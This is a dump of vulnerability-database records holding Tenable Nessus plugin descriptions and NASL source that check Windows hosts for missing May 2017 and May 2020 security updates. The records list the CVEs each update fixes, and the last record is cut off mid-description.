script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?20528be0\");\n # https://support.microsoft.com/en-us/help/4556843/windows-7-update-kb4556843\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dcc204d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4556843 or Cumulative Update KB4556836.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1176\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1112\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n '4556836',\n '4556843'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'05_2020',\n bulletin:bulletin,\n rollup_kb_list:[4556836, 4556843])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in 